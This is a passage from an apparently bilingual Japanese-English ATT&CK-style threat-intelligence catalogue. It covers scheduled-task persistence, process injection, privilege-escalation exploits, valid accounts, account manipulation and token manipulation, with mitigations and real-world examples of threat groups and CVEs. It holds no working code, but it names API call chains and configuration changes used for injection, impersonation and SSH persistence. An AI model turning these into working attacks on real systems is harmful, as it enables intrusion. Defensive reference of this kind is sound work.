Windows environments, using at requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with at by directly leveraging the Windows Management Instrumentation `Win32_ScheduledJob` WMI class. 敵対者は、cronを悪用してタスクを定期実行し永続化することがある。Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code. The <code>cron</code> utility is a time-based job scheduler for Unix-like operating systems. The <code> crontab</code> file contains the schedule of cron entries to be run and the specified times for execution. Any <code>crontab</code> files are stored in operating system-specific file paths. 敵対者は、Windowsのスケジュールされたタスクを悪用して実行・永続化することがある。Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and Windows Management Instrumentation (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path. 敵対者は、systemdタイマーを悪用してタスクを定期実行し永続化することがある。Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to Cron in Linux environments. Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over SSH. 敵対者は、コンテナオーケストレーションのジョブ機能を悪用してタスクを実行・永続化することがある。Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster. アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 OSを安全に構成し、攻撃対象領域を縮小する。 システムやアカウントを監査し、不正な活動を検出する。 スケジュールされたタスク/ジョブに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 2025 Poland Wiper Attacks, the adversaries set FortiGate scheduled tasks to run the adversary generated CLI scripts weekly. Lokibot's second stage DLL has set a timer using “timeSetEvent” to schedule its next execution. 敵対者は、正規プロセスに悪意あるコードを注入して権限昇格やステルスを行うことがある。 Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. 敵対者は、正規プロセスにDLLを注入して悪意あるコードを実行することがある。Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、正規プロセスにPE（実行ファイル）を注入して実行することがある。Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、既存スレッドの実行を乗っ取ってコードを実行することがある。Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、非同期プロシージャコール(APC)を悪用してコードを注入することがある。Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、スレッドローカルストレージを悪用してコードを注入することがある。Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、ptraceシステムコールを悪用して他プロセスにコードを注入することがある。Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、/procメモリを悪用してコードを注入することがある。Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、Extra Window Memoryを悪用してコードを注入することがある。Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、プロセスハロウィングで正規プロセスの中身を悪意あるコードに置き換えることがある。Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、プロセスドッペルゲンギングで検知を回避しつつコードを実行することがある。Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、VDSOハイジャックでコードを注入することがある。Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、ListPlantingを悪用してコードを注入することがある。Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process. 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 エンドポイントで悪意ある挙動を検出・防止する。 プロセスインジェクションに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Sharpshooter, threat actors leveraged embedded shellcode to inject a downloader into the memory of Word. During Operation Wocao, threat actors injected code into a selected process, which in turn launches a command as a child process of the original. During the 2015 Ukraine Electric Power Attack, Sandworm Team loaded BlackEnergy into svchost.exe, which then launched iexplore.exe for their C2. During Cutting Edge, threat actors used malicious SparkGateway plugins to inject shared objects into web process memory on compromised Ivanti Secure Connect VPNs to enable deployment of backdoors. ArcaneDoor included injecting code into the AAA and Crash Dump processes on infected Cisco ASA devices. During RedPenguin, UNC3886 exploited CVE-2025-21590 to enable malicious code injection into the memory of legitimate processes. During the 3CX Supply Chain Attack, AppleJeus's VEILEDSIGNAL uses process injection to inject the C2 communication module code in the first found process instance of Chrome, Firefox, or Edge web browsers. It also monitors the established named pipe and re-injects the C2 communication module if necessary. Turla has also used PowerSploit's <code>Invoke-ReflectivePEInjection.ps1</code> to reflectively load a PowerShell payload into a random process on the victim system. Gamaredon Group has injected Remcos into explorer.exe. APT32 malware has injected a Cobalt Strike beacon into Rundll32.exe. APT37 injects its malware variant, ROKRAT, into the cmd.exe process. PLATINUM has used various methods of process injection including hot patching. Cobalt Group has injected code into trusted processes. APT38 has injected malicious payloads into the `explorer.exe` process. Silence has injected a DLL library containing a Trojan into the fwmain32.exe process. Kimsuky has used Win7Elevate to inject malicious code into explorer.exe. APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process. Wizard Spider has used process injection to execute payloads to escalate privileges. TA2541 has injected malicious code into legitimate .NET related processes including regsvcs.exe, msbuild.exe, and installutil.exe. APT5 has used the CLEANPULSE utility to insert command line strings into a targeted process to alter its functionality. BlackByte has injected Cobalt Strike into `wuauclt.exe` during intrusions. BlackByte has injected ransomware into `svchost.exe` before encryption. Velvet Ant initial execution included launching multiple `svchost` processes and injecting code into them. Dyre has the ability to directly inject its code into the web browser process. gh0st RAT can inject malicious code into process created by the “Command_Create&Inject” function. HTRAN can inject into into running processes. JHUHUGIT performs code injection injecting its own functions to browser processes. Mis-Type has been injected directly into a running process, including `explorer.exe`. Backdoor.Oldrea injects itself into explorer.exe. Cobalt Strike can inject a variety of payloads into processes dynamically chosen by the adversary. Gazer injects its communication module into an Internet accessible process through which it performs C2. Wingbird performs multiple process injections to hijack system processes and execute malicious code. NETWIRE can inject code into system processes including notepad.exe, svchost.exe, and vbc.exe. JPIN can inject content into lsass.exe to load a module. Wiarp creates a backdoor through which remote attackers can inject files into running processes. Smoke Loader injects into the Internet Explorer process. ROKRAT can use `VirtualAlloc`, `WriteProcessMemory`, and then `CreateRemoteThread` to execute shellcode within the address space of `Notepad.exe`. NavRAT copies itself into a running Internet Explorer process to evade detection. InvisiMole can inject itself into another process to avoid detection including use of a technique called ListPlanting that customizes the sorting algorithm in a ListView structure. TrickBot has used <code>Nt*</code> Native API functions to inject code into legitimate processes such as <code>wermgr.exe</code>. Agent Tesla can inject into known, vulnerable binaries on targeted hosts. Remcos has a command to hide itself by injecting into another process. AuditCred can inject code from files to other running processes. Cardinal RAT injects into a newly spawned process created from a native Windows executable. Empire contains multiple modules for injecting into processes, such as <code>Invoke-PSInject</code>. HOPLIGHT has injected into running processes. PoshC2 contains multiple modules for injecting into processes, such as <code>Invoke-PSInject</code>. StoneDrill has relied on injecting its payload directly into the process memory of the victim's preferred browser. HyperBro can run shellcode it injects into a newly created process. TSCookie has the ability to inject code into the svchost.exe, iexplorer.exe, explorer.exe, and default browser processes. Attor's dispatcher can inject itself into running processes to gain higher privileges and to evade detection. Ryuk has injected itself into remote processes to encrypt files using a combination of <code>VirtualAlloc</code>, <code>WriteProcessMemory</code>, and <code>CreateRemoteThread</code>. ABK has the ability to inject shellcode into svchost.exe. BBK has the ability to inject shellcode into svchost.exe. Avenger has the ability to inject shellcode into svchost.exe. REvil can inject itself into running processes on a compromised host. SLOTHFULMEDIA can inject into running processes on a compromised host. Bazar can inject code through calling <code>VirtualAllocExNuma</code>. Egregor can inject its payload into iexplore.exe process. GuLoader has the ability to inject shellcode into a donor processes that is started in a suspended state. GuLoader has previously used RegAsm as a donor process. Waterbear can inject decrypted shellcode into the LanmanServer service. IronNetInjector can use an IronPython scripts to load a .NET injector to inject a payload into its own or a remote process. ShadowPad has injected an install module into a newly created process. CostaBricks can inject a payload into the memory of a compromised host. Sliver includes multiple methods to perform process injection to migrate the framework into other, potentially privileged processes on the victim machine. QakBot can inject itself into processes including explore.exe, Iexplore.exe, Mobsync.exe., and wermgr.exe. Clambling can inject into the `svchost.exe` process for execution. Pandora can start and inject code into a new `svchost` process. WarzoneRAT has the ability to inject malicious DLLs into a specific process for privilege escalation. Lizar can migrate the loader into another process. SILENTTRINITY can inject shellcode directly into Excel.exe or a specific process. Donut includes a subproject <code>DonutTest</code> to inject shellcode into a target process. Bumblebee can inject code into multiple processes on infected endpoints. The PcShare payload has been injected into the `logagent.exe` and `rdpclip.exe` processes. metaMain can inject the loader file, Speech02.db, into a process. Woody RAT can inject code into a targeted process by writing to the remote memory of an infected system and then create a remote thread. ANDROMEDA can inject into the `wuauclt.exe` process to perform C2 actions. BADHATCH can inject itself into an existing explorer.exe process by using `RtlCreateUserThread`. Ninja has the ability to inject an agent module into a new process and arbitrary shellcode into running processes. COATHANGER includes a binary labeled `authd` that can inject a library into a running process and then hook an existing function within that process with a new function from that library. Mispadu's binary is injected into memory via `WriteProcessMemory`. DUSTTRAP compromises the `.text` section of a legitimate system DLL in `%windir%` to hold the contents of retrieved plug-ins. BlackByte 2.0 Ransomware injects into a newly-created `svchost.exe` process prior to device encryption. PureCrypter can inject its final stage into another process on the targeted system. LODEINFO can inject shellcode into the memory of compromised hosts. DOWNIISSA can inject shellcode directly into process memory including WINWORD.exe and msiexec.exe. HiddenFace can inject code directly into legitimate applications. NOOPLDR can inject decrypted payloads into processes including wuauclt.exe., rdrleakdiag.exe, and tabcal.exe. 敵対者は、脆弱性を悪用してより高い権限を取得することがある。 Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. 脅威インテリジェンスを活用し、対象となる脅威アクターのTTPを把握する。 許可されていないコードの実行を防止する。 アプリを分離・サンドボックス化し、影響範囲を限定する。 エクスプロイト保護機能で脆弱性悪用を防ぐ。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 権限昇格のための脆弱性悪用に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During ShadowRay, threat actors downloaded a privilege escalation payload to gain root access. Leviathan exploited software vulnerabilities in victim environments to escalate privileges during Leviathan Australian Intrusions. APT28 has exploited CVE-2014-4076, CVE-2015-2387, CVE-2015-1701, CVE-2017-0263, and CVE-2022-38028 to escalate privileges. Turla has exploited vulnerabilities in the VBoxDrv.sys driver to obtain kernel mode privileges. APT29 has exploited CVE-2021-36934 to escalate privileges on a compromised host. Threat Group-3390 has used CVE-2014-6324 and CVE-2017-0213 to escalate privileges. FIN6 has used tools to exploit Windows vulnerabilities in order to escalate privileges. The tools targeted CVE-2013-3660, CVE-2011-2005, and CVE-2010-4398, all of which could allow local users to access kernel-level privileges. OilRig has exploited the Windows Kernel Elevation of Privilege vulnerability, CVE-2024-30088. APT32 has used CVE-2016-7255 to escalate privileges. FIN8 has exploited the CVE-2016-0167 local vulnerability. APT33 has used a publicly available exploit for CVE-2017-0213 to escalate privileges on a local system. PLATINUM has leveraged a zero-day vulnerability to escalate privileges. Cobalt Group has used exploits to increase their levels of rights and privileges. Whitefly has used an open-source tool to exploit a known Windows privilege escalation vulnerability (CVE-2016-0051) on unpatched computers. HAFNIUM has targeted unpatched applications to elevate access in targeted organizations. ZIRCONIUM has exploited CVE-2017-0005 for local privilege escalation. Tonto Team has exploited CVE-2019-0803 and MS16-032 to escalate privileges. BITTER has exploited CVE-2021-1732 for privilege escalation. LAPSUS$ has exploited unpatched vulnerabilities on internally accessible servers including JIRA, GitLab, and Confluence for privilege escalation. Scattered Spider has deployed a malicious kernel driver through exploitation of CVE-2015-2291 in the Intel Ethernet diagnostics driver for Windows (iqvw64.sys). Volt Typhoon has gained initial access by exploiting privilege escalation vulnerabilities in the operating system or network services. MoustachedBouncer has exploited CVE-2021-1732 to execute malware components with elevated rights. BlackByte has exploited CVE-2024-37085 in VMWare ESXi software for authentication bypass and subsequent privilege escalation. UNC3886 has exploited zero-day vulnerability CVE-2023-20867 to enable execution of privileged commands across Windows, Linux, and PhotonOS (vCenter) guest VMs. JHUHUGIT has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges. CosmicDuke attempts to exploit privilege escalation vulnerabilities CVE-2010-0232 or CVE-2010-4398. Remsec has a plugin to drop and execute vulnerable Outpost Sandbox or avast! Virtualization drivers in order to gain kernel mode privileges. Cobalt Strike can exploit vulnerabilities such as MS14-058. Wingbird exploits CVE-2016-4117 to allow an executable to gain escalated privileges. InvisiMole has exploited CVE-2007-5633 vulnerability in the speedfan.sys driver to obtain kernel mode privileges. Empire can exploit vulnerabilities such as MS16-032 and MS16-135. PoshC2 contains modules for local privilege escalation exploits such as CVE-2016-9192 and CVE-2016-0099. Carberp has exploited multiple Windows vulnerabilities (CVE-2010-2743, CVE-2010-3338, CVE-2010-4398, CVE-2008-1084) and a .NET Runtime Optimization vulnerability for privilege escalation. Hildegard has used the BOtB tool which exploits CVE-2019-5736. Stuxnet used MS10-073 and an undisclosed Task Scheduler vulnerability to escalate privileges on local Windows machines. Siloscape has leveraged a vulnerability in Windows containers to perform an Escape to Host. ProLock can use CVE-2019-0859 to escalate privileges on a compromised host. XCSSET has used a zero-day exploit in the ssh launchdaemon to elevate privileges and bypass SIP. Pandora can use CVE-2017-15303 to bypass Windows Driver Signature Enforcement (DSE) protection and load its driver. Zox has the ability to leverage local and remote exploits to escalate privileges. ZeroCleare has used a vulnerable signed VBoxDrv driver to bypass Microsoft Driver Signature Enforcement (DSE) protections and subsequently load the unsigned RawDisk driver. BlackByte 2.0 Ransomware exploits a vulnerability in the RTCore64.sys driver (CVE-2019-16098) to enable privilege escalation and defense evasion when run as a service. Embargo has leveraged MS4Killer to deliver a vulnerable driver to the victim device, sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD). Embargo has utilized the vulnerable driver probmon.sys version 3.0.0.4 which had a revoked certificated from “ITM System Co.,LTD.” 敵対者は、有効なアカウントの認証情報を用いて検知を回避しアクセスすることがある。 Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. 敵対者は、デフォルトアカウントの認証情報を悪用してアクセスや権限維持を行うことがある。Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes. 敵対者は、ドメインアカウントの認証情報を悪用してアクセスや横展開を行うことがある。Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services. 敵対者は、ローカルアカウントの認証情報を悪用してアクセスを行うことがある。Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. 敵対者は、クラウドアカウントの認証情報を悪用してアクセスや権限維持を行うことがある。Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. 開発者に対し、脆弱性を生まない安全な設計・実装の指針を提供する。 Active Directoryを適切に構成し、攻撃対象領域を縮小する。 ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 アカウントの作成・権限・ライフサイクルを適切に管理する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 ログイン試行回数やロックアウト等のアカウント使用ポリシーを設定する。 有効なアカウントに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Night Dragon, threat actors used compromised VPN accounts to gain access to victim systems. During Operation Wocao, threat actors used valid VPN credentials to gain initial access. During the SolarWinds Compromise, APT29 used different compromised credentials for remote access and to move laterally. During the 2015 Ukraine Electric Power Attack, Sandworm Team used valid accounts on the corporate network to escalate privileges, move laterally, and establish persistence within the corporate network. During the C0032 campaign, TEMP.Veles used compromised VPN accounts. During HomeLand Justice, threat actors used a compromised Exchange account to search mailboxes and create new Exchange accounts. During Operation MidnightEclipse, threat actors extracted sensitive credentials while moving laterally through compromised networks. Leviathan used captured, valid account information to log into victim web applications and appliances during Leviathan Australian Intrusions. During RedPenguin, UNC3886 used legitimate credentials to gain priviliged access to Juniper routers. During 3CX Supply Chain Attack, AppleJeus has gained access to the 3CX corporate environment through legitimate VPN credentials. During the Anthropic AI-orchestrated Campaign, the adversary used harvested credentials to authenticate against internal APIs, database systems, container registries, and logging infrastructure across targeted networks. Axiom has used previously compromised administrative accounts to escalate privileges. Ke3chang has used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. APT28 has used legitimate credentials to gain initial access, maintain access, and exfiltrate data from a victim network. The group has specifically used credentials stolen through a spearphishing email to login to the DCCC network. The group has also leveraged default manufacturer's passwords to gain initial access to corporate networks via IoT devices such as a VOIP phone, printer, and video decoder. Carbanak actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars. PittyTiger attempts to obtain legitimate credentials during operations. APT29 has used a compromised account to access an organization's VPN infrastructure. APT18 actors leverage legitimate credentials to log into external remote services. Threat Group-3390 actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks. Lazarus Group has used administrator credentials to gain access to restricted network segments. Sandworm Team have used previously acquired legitimate credentials prior to attacks. Dragonfly has compromised user credentials and used valid accounts for operations. To move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes. Suckfly used legitimate account credentials that they dumped to navigate the internal victim network as though they were the legitimate account owner. menuPass has used valid accounts including shared between Managed Service Providers and clients to move between the two environments. FIN7 has harvested valid administrative credentials for lateral movement. OilRig has used compromised credentials to access other systems on a victim network. FIN10 has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor. FIN5 has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment. FIN8 has used valid accounts for persistence and lateral movement. APT33 has used valid accounts for initial access and privilege escalation. Leviathan has obtained valid accounts to gain initial access. FIN4 has used legitimate credentials to hijack email communications. APT39 has used stolen credentials to compromise Outlook Web Access (OWA). Silence has used compromised credentials to log on to other systems and escalate privileges. GALLIUM leveraged valid accounts to maintain access to a victim network. APT41 used compromised credentials to log on to other systems. Wizard Spider has used valid credentials for privileged accounts with the goal of accessing domain controllers. Chimera has used a valid account to maintain persistence via scheduled task. Fox Kitten has used valid credentials with various services during lateral movement. Indrik Spider has used valid accounts for initial access and lateral movement. Indrik Spider has also maintained access to the victim environment through the VPN infrastructure. Silent Librarian has used compromised credentials to obtain unauthorized access to online accounts. LAPSUS$ has used compromised credentials and/or session tokens to gain access into a victim's VPN, VDI, RDP, and IAMs. POLONIUM has used valid compromised credentials to gain access to victim environments. Scattered Spider has used compromised credentials for initial access. Volt Typhoon relies primarily on valid credentials for persistence. Cinnamon Tempest has used compromised user accounts to deploy payloads and create system services. Akira uses valid account information to remotely access victim networks, such as VPN credentials. INC Ransom has used compromised valid accounts for access to victim environments. Star Blizzard has used stolen credentials to sign into victim email accounts. Play has used valid VPN accounts to achieve initial access. Sea Turtle used compromised credentials to maintain long-term access to victim environments. BlackByte has gained access to victim environments through legitimate VPN credentials. UNC3886 has used tools to hijack valid SSH accounts. Medusa Group has utilized compromised legitimate local and domain accounts within the victim environment to facilitate remote access and lateral movement sometimes in combination with PsExec. VOID MANTICORE has leveraged valid accounts to log into VPN infrastructure. VOID MANTICORE has used compromised valid credentials to gain access to management infrastructure and enterprise control systems. VOID MANTICORE has also validated and tested authentication using compromised credentials prior to malicious actions. Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware. Some SeaDuke samples have a module to extract email from Microsoft Exchange servers using compromised credentials. Linux Rabbit acquires valid SSH accounts through brute force. Dtrack used hard-coded credentials to gain access to a network share. Kinsing has used valid SSH credentials to access remote hosts. Industroyer can use supplied user credentials to execute processes and stop services. LP-Notes has used stolen Windows credentials to log in as the users. 敵対者は、アカウントの権限や認証情報を操作してアクセスを維持することがある。 Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. 敵対者は、追加のクラウド認証情報を登録してアクセスを維持することがある。Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. 敵対者は、追加のメール委任権限を付与してアクセスを維持することがある。Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. 敵対者は、追加のクラウドロールを付与して権限を維持/昇格することがある。An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments. With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins). 敵対者は、SSH認証鍵を追加してアクセスを維持することがある。Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions, macOS, and ESXi hypervisors commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <code>&lt;user-home&gt;/.ssh/authorized_keys</code> (or, on ESXi, `/etc/ssh/keys-<username>/authorized_keys`). Users may edit the system’s SSH config file to modify the directives `PubkeyAuthentication` and `RSAAuthentication` to the value `yes` to ensure public key and RSA authentication are enabled, as well as modify the directive `PermitRootLogin` to the value `yes` to enable root authentication via SSH. The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>. 敵対者は、デバイスを登録してアクセスや永続化を行うことがある。Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance. 敵対者は、追加のコンテナクラスタロールを付与して権限を維持することがある。An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account. Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions. This account modification may immediately follow Create Account or other malicious account activity. Adversaries may also modify existing Valid Accounts that they have compromised. 敵対者は、ローカル/ドメイングループへの追加でアクセスや権限を維持することがある。An adversary may add additional local or domain groups to an adversary-controlled account to maintain persistent access to a system or domain. アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 OSを安全に構成し、攻撃対象領域を縮小する。 ネットワークを分割し、横展開や影響範囲を限定する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 アカウント操作に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 2016 Ukraine Electric Power Attack, Sandworm Team used the `sp_addlinkedsrvlogin` command in MS-SQL to create a link between a created account and other servers in the network. Lazarus Group malware WhiskeyDelta-Two contains a function that attempts to rename the administrator’s account. HAFNIUM has granted privileges to domain accounts and reset the password for default admin accounts. Scattered Spider has added accounts to the ESX Admins group to grant them full admin rights in vSphere. VOID MANTICORE has leveraged access to administrative control systems to achieve disruptive effects, consistent with administrative account abuse or privilege escalation within existing access. The Mimikatz credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The <code>LSADUMP::ChangeNTLM</code> and <code>LSADUMP::SetNTLM</code> modules can also manipulate the password hash of an account without knowing the clear text value. Calisto adds permissions and remote logins to all users. Shai-Hulud has modified GitHub account settings for private repositories and changed them to public. 敵対者は、アクセストークンを操作して別ユーザーになりすまし権限昇格することがある。 Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. 敵対者は、トークンを偽装/窃取して別ユーザーになりすますことがある。Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`. The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread. 敵対者は、窃取したトークンを用いてプロセスを作成することがある。Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>. 敵対者は、トークンを作成・偽装してなりすますことがある。Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function. The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread. 敵対者は、親PIDをスプーフィングしてプロセスの出自を偽装することがある。Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use. This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context. 敵対者は、SID履歴を注入して権限を昇格することがある。Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. An account can hold additional SIDs in the SID-History Active Directory attribute , allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens). アカウントの作成・権限・ライフサイクルを適切に管理する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 アクセストークン操作に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local `NT AUTHORITY\SYSTEM` privilege escalation. Lotus Blossom has retrieved process tokens for processes to adjust the privileges of the launch process or other items. FIN6 has used has used Metasploit’s named-pipe 